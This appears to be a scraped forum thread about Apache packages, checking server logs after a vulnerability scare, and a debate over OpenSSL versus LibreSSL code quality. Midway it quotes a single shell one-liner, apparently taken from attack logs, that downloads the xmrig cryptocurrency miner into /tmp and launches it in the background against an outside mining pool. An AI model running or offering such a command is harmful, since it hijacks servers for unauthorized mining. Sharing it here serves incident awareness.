Thanks for the clarifications. I just thought Apache = httpd.
I guess there could be some nastiness in hosted user directories. I'll check the logs.
Thanks much!
Thanks for the clarifications. I just thought Apache = httpd.
Understandable. The Apache httpd server was their first and oldest product. So the two became somewhat of a synonym.
In this instance, I meant "port" as in "package". I have a couple of LDAP-related packages installed on the server.
Java and javascript have, besides their name, nothing in common.
bloat magnets
This is a tautology, but, I don't know why "we" still use openssl, rather than libressl. Yet, I do know why "we" don't because openssl keeps changing the API to stop Libressl's adoption. But maybe that's just the cynic in me.
But 1.1.1m HAS been released - but I can't find a detailed changelog so not sure if a minor release or security-orientated.
nvd.nist.gov
uname -a;killall -9 xmrig;cd /tmp; wget https://github.com/xmrig/xmrig/releases/download/v6.5.3/xmrig-6.5.3-linux-static-x64.tar.gz;tar -xzvf xmrig-6.5.3-linux-static-x64.tar.gz;cd xmrig-6.5.3;rm -rf config.json;./xmrig --donate-level 1 -o bernais.axfor.com:80 -u jav2 -p jav2 -k -B
www.lunasec.io
Because since the beginning LibreSSL was announced and promoted like used car dealers promote a 40 years old Beetle as a semi-new 911. Not everyone takes claims made by used car dealers at face value. Just in the case FreeBSD would switch to LibreSSL in base, I will then switch to OpenSSL in the ports.
nvd.nist.gov
What are some specific problems in Libressl you take issue with?
Like many of us, I followed the launch of LibreSSL in the press. For example this one:
arstechnica.com
Well, sounds reasonable, until you take the time and have a look into the OpenSSL code yourself. I found it clean and organized, and I could very well read and understand the parts which I opened - of course I did not do my own code review of everything. Actually, Theo wouldn’t have been able to proudly bragging they’d removed half of the source tree, if OpenSSL would have been that a huge code chaos.
Theo is not the only talented hacker who found the Openssl code unpleasant:Like many of us, I followed the launch of LibreSSL in the press. For example this one:
OpenSSL code beyond repair, claims creator of “LibreSSL” fork
OpenBSD developers "removed half of the OpenSSL source tree in a week."
Well, sounds reasonable, until you take the time and have a look into the OpenSSL code yourself. I found it clean and organized, and I could very well read and understand the parts which I opened - of course I did not do my own code review of everything.
Well it had support for big-endian i386 and amd64. Weird and obsolete stuff like OS/2 and Openvms. Hacks to work with ancient, obsolete compilers like Visual C 1.52c. And the crown jewel of obstreperous programming, a custom memory allocator that broke memory debugging tools like Valgrind. I have no trouble believing they removed 90k lines of code.
And in any case, I trust results more than beliefs:
For all my projects I user a custom wrapper to the systems memory allocator, because the system ones got its limit. For example you cannot easily tell free() to clean the memory before releasing it. This is of major importance in tools like OpenSSL, and if you want to make sure that everybody uses the deallocate() function wich does cleaning the memory before freeing, then building your own one is not that a bad of an idea.
I have no difficulties to believe this either. I don’t believe the Milkmaid's bill, alike 90k less code adds 90 times better security. I will stay with OpenSSL, that’s it.
The Openssl wrapper didn't exist for any of those reasons. It was added because some malloc somewhere was "slow" at some point likely in the '90s.
Not only did the Openssl wrapper not do this, it made it impossible to use other tools to find this kind of problem.
Or an opportunity to derail it into complaining about an unrelated package.
